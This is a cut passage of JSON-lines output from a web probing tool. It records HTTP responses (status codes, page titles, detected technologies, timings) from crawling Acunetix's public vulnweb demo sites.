login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp\",\"time\":\"356.387167ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3190,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.29576161Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Search.asp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Search.asp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=/Search.asp\",\"time\":\"344.350781ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3190,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.299693352Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Register.asp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Register.asp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=/Register.asp\",\"time\":\"347.431139ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3194,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.299693448Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FSearch%2Easp%3F\",\"time\":\"358.097958ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3196,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.30431852Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2Flogin%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2Flogin%2Easp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2Flogin%2Easp\",\"time\":\"356.520374ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3188,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.557893807Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/login.asp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/login.asp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=/login.asp\",\"time\":\"343.541868ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3188,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.594111238Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FDefault%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FDefault%2Easp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FDefault%2Easp\",\"time\":\"347.873124ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3609,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.672868387Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FDefault%2Easp%3F\",\"time\":\"347.072901ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3615,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.698652927Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FRegister%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FRegister%2Easp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FRegister%2Easp\",\"time\":\"352.551046ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3611,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.723679564Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FSearch%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FSearch%2Easp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp\",\"time\":\"350.99272ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3607,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.818323599Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FSearch%2Easp%3F\",\"time\":\"343.376032ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3613,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.964721281Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"time\":\"346.256426ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3673,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.036380883Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2Flogin%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=%2Flogin%2Easp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Flogin%2Easp\",\"time\":\"347.118865ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3605,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.06595449Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Default.asp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Default.asp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=/Default.asp\",\"time\":\"348.767112ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3609,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.072108128Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Search.asp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Search.asp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=/Search.asp\",\"time\":\"352.757116ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3607,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.075588641Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Register.asp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/Register.asp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=/Register.asp\",\"time\":\"356.679531ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3611,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.080237265Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/login.asp\",\"input\":\"http://testasp.vulnweb.com:80/Register.asp?RetURL=/login.asp\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=/login.asp\",\"time\":\"349.647925ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3605,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.15464167Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Search.asp\",\"input\":\"http://testasp.vulnweb.com:80/Search.asp\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp\",\"time\":\"349.400026ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":319,\"lines\":44,\"status_code\":200,\"content_length\":2809,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.18842456Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/T\",\"input\":\"http://testasp.vulnweb.com:80/T\",\"location\":\"http://testasp.vulnweb.com/T/\",\"title\":\"Document Moved\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/T\",\"time\":\"352.435914ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":9,\"lines\":2,\"status_code\":301,\"content_length\":152,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.251193877Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Templatize.asp?item=html/about.html\",\"input\":\"http://testasp.vulnweb.com:80/Templatize.asp?item=html/about.html\",\"title\":\"Untitled Document\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templatize.asp?item=html/about.html\",\"time\":\"355.394754ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":506,\"lines\":66,\"status_code\":200,\"content_length\":4594,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.267911959Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/admin\",\"input\":\"http://testasp.vulnweb.com:80/admin\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/admin\",\"time\":\"344.45008ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.307300706Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/t/fit.txt?.\",\"input\":\"http://testasp.vulnweb.com:80/t/fit.txt?.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.\",\"time\":\"339.799897ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.3147657Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/styles.css\",\"input\":\"http://testasp.vulnweb.com:80/styles.css\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/styles.css\",\"time\":\"348.047789ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":201,\"lines\":190,\"status_code\":200,\"content_length\":3390,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.316538196Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/showforum.asp?id=0\",\"input\":\"http://testasp.vulnweb.com:80/showforum.asp?id=0\",\"title\":\"acuforum Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=0\",\"time\":\"355.770068ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":323,\"lines\":51,\"status_code\":200,\"content_length\":4113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.317027755Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/showforum.asp?id=1\",\"input\":\"http://testasp.vulnweb.com:80/showforum.asp?id=1\",\"title\":\"acuforum Weather\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=1\",\"time\":\"353.022668ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":289,\"lines\":51,\"status_code\":200,\"content_length\":3077,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.326421356Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/showforum.asp?id=2\",\"input\":\"http://testasp.vulnweb.com:80/showforum.asp?id=2\",\"title\":\"acuforum Miscellaneous\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=2\",\"time\":\"349.096817ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":284,\"lines\":51,\"status_code\":200,\"content_length\":2933,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:41.333106935Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/t/fit.txt?.tst\",\"input\":\"http://testasp.vulnweb.com:80/t/fit.txt?.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.tst\",\"time\":\"342.402803ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:49.46551739Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9874\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9874\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9874\",\"time\":\"352.611732ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:49.5242945Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?993703\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?993703\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?993703\",\"time\":\"362.101067ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:49.525234715Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9992\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9992\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9992\",\"time\":\"340.147608ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:50.648777115Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Acunetix\",\"input\":\"http://testaspnet.vulnweb.com/Acunetix\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Acunetix\",\"time\":\"342.797204ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:50.665387314Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/–\",\"input\":\"http://testaspnet.vulnweb.com/%E2%80%93\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/%E2%80%93\",\"time\":\"358.80529ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:50.671940556Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/’\",\"input\":\"http://testaspnet.vulnweb.com/%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/%E2%80%99\",\"time\":\"356.765918ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:50.858699217Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com\",\"input\":\"http://testaspnet.vulnweb.com\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"516.563072ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14066,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:50.895750099Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=0\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=0\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=0\",\"time\":\"539.062211ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":651,\"lines\":108,\"status_code\":200,\"content_length\":13861,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.120103565Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=1337\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=1337\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=1337\",\"time\":\"523.391882ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":610,\"lines\":110,\"status_code\":200,\"content_length\":13326,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.152262144Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=2\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=2\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=2\",\"time\":\"514.347717ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":686,\"lines\":108,\"status_code\":200,\"content_length\":14399,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.241139566Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=3\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=3\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=3\",\"time\":\"513.509764ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows 